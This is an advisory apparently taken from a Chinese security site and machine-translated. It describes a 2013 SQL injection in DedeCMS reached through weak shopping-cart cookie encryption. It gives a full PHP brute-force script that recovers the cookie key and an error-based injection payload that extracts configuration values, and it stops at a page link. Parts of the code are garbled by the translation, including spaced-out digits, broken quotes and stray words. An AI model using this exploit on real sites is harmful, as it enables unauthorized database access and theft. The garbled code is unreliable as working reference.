Woven dream CMS vulnerability dedecms vulnerability 2013-02-10 SQL injection vulnerability-vulnerability warning-the black bar safety net

2013-02-17T00:00:00
ID MYHACK58:62201337362
Type myhack58
Reporter 佚名
Modified 2013-02-17T00:00:00

Description

www.xxx.com/plus/search.php?keyword=

In include/shopcar. class. php First take a look at this shopcar class is how to generate the cookie function saveCookie($key,$value) { if(is_array($value)) { $value = $this->enCrypt($this->enCode($value)); } else { $value = $this->enCrypt($value); } setcookie($key,$value,time()+3 6 0 0 0,’/’); } Simply put,$key is the cookie key, value is value, the enCode of the role is the array type is converted to the a=yy&b=cc&d=know such a type, the key is the enCrypt function function enCrypt($txt) { srand((double)microtime() * 1 0 0 0 0 0 0); $encrypt_key = md5(rand(0, 3 2 0 0 0)); $ctr = 0; $tmp = ”; for($i = 0; $i < strlen($txt); $i++) { $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; $tmp .= $encrypt_key[$ctr]. ($txt[$i] ^ $encrypt_key[$ctr++]); } return base64_encode($this->setKey($tmp)); } function setKey($txt) { global $cfg_cookie_encode; $encrypt_key = md5(via strtolower($cfg_cookie_encode)); $ctr = 0; $tmp = ”; for($i = 0; $i < strlen($txt); $i++) { $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; $tmp .= $txt[$i] ^ $encrypt_key[$ctr++]; } return $tmp; } enCrypt the parameter$txt we is known, the return value is the value of a cookie, this we is also known Then to enCrypt calls setKey when the parameters$tmp, this parameter, in some sense, we are also known as$encrypt_key = md5(rand(0, 3 2 0 0 0));only 3 2 0 0 0 possible, we can launch 3 2 0 0 0 of a possible$tmp, which launched 3 2 0 0 0 possible md5(via strtolower($cfg_cookie_encode)), by the way, forgot to say, our purpose is to infer the setKey$encrypt_key's value, and then to arbitrarily construct out of the cart cookie from launch 3 2 0 0 0 species md5(via strtolower($cfg_cookie_encode)), simply filter out non-alphanumeric key, it is only a few hundred possible key, and then we'll from the new next order, and then get several hundred possible key, and then intersected to obtain the final key. Specific code is as follows: <? php $cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyb3zxjfiwa20lialzu2ulparyamqgivu5vyjbffvsbiynn1dsug0dil90utftlao3vjbxygbvvzgazaeqbz9xagclvzbsbw==”; // here is the first cookie,the change here $cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtvcuie1ayc2uojvmpadybngj0amrucw5iancaj1jrcslqalbraj8ciwaramjukwy7a2uipvm8bwpsnltwuwkinvr2cg9qbq==”; // here is the second cookie ,the change here $plantxt = "id=2&price=0&units=fun&buynum=1&title=naduohua1"; // here is the text , change here function reStrCode($code,$string) { $code = base64_decode($code); $key = “”; for($i=0 ; $i<3 2 ; $i++) { $key .= $string[$i] ^ $code[$i]; } return $key; } function getKeys($cookie,$plantxt) { $tmp = $cookie; $results = array(); for($j=0 ; $j < 3 2 0 0 0; $j++) { $txt = $plantxt; $ctr = 0; $tmp = ”; $encrypt_key = md5($j); for($i =0; $i < strlen($txt); $i ++) { $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; $tmp .= $encrypt_key[$ctr]. ($txt[$i] ^ $encrypt_key[$ctr++]); } $string = $tmp; $code = $cookies; $result = reStrCode($code,$string); if(eregi(‘^[a-z0-9]+$’,$result)) { echo $result.”\ n”; $results[] = $result; } } return $results; } $results1 = getKeys($cookie1,$plantxt); $results2 = getKeys($cookie2,$plantxt); print “\n-------the real key---------\n”; foreach($results1 as $test1) { foreach($results2 as $test2) { if($test1 == $test2) { echo $test1.”\ n”; } } } ?& gt; cookie1 and cookie2 are my next two orders, respectively, after the generation of the cookie plantxt can be based on the page come to their own reckoning, probably this is the format: id=2&price=0&units=fun&buynum=1&title=naduohua1 Then calculate the md5(via strtolower($cfg_cookie_encode)) To get this key, we can construct any shopping cart cookie Then see class MemberShops { var $OrdersId; var $productsId;

function __construct() { $this->OrdersId = $this->getCookie(“OrdersId”); if(empty($this->OrdersId)) { $this->OrdersId = $this->MakeOrders(); } } Find the OrderId from the cookies inside get Then /plus/carbuyaction. in php $cart = new MemberShops(); $OrdersId = $cart->OrdersId; //this record the order number ... $rows = $dsql->GetOne("SELECT oid FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1"); Then we can inject By using the following code to generate the cookie: <? php $txt = "1' or 1=@\" and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,6 2)))a from information_schema. tables group by a)b) or 1=@\" or '1'='1";

[1] [2] next